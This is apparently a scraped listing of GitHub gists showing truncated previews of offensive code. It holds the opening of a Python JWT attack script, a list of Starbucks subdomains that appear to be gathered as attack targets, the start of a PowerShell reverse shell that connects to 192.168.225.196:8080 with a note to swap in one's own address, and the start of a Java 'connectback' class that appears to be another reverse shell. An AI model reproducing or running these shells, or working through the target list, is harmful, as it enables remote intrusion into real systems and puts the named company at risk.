This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/lib/env python3 | |
# For more description with other attacks check out my BLOG ==> https://imparable.medium.com/attacking-json-web-tokens-jwts-d1d51a1e17cb | |
import OpenSSL | |
import base64 | |
import json | |
import hashlib | |
import urllib |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://tazotea.net | |
http://starbucks.de | |
http://gaeste-service.starbucks.de | |
http://en.starbucks.at | |
https://xtras.starbucks.at:8081 | |
http://test.starbucks.de | |
http-proxy://bi-dc-cert.starbucks.net | |
https://test.starbucks.de | |
http://www.coffee.starbucks.at | |
http://customerservice.starbucks.ch |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$socket = new-object System.Net.Sockets.TcpClient('192.168.225.196', 8080); // change the ip and port accordingly | |
if($socket -eq $null){exit 1} | |
$stream = $socket.GetStream(); | |
$writer = new-object System.IO.StreamWriter($stream); | |
$buffer = new-object System.Byte[] 1024; | |
$encoding = new-object System.Text.AsciiEncoding; | |
do | |
{ | |
$writer.Flush(); | |
$read = $null; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//Author #Captain_Nemo | |
import java.net.*; | |
import java.io.*; | |
import java.io.OutputStream; | |
import java.io.InputStream; | |
public class connectback { | |
public static void main (String args[]) throws Exception { | |
int c; |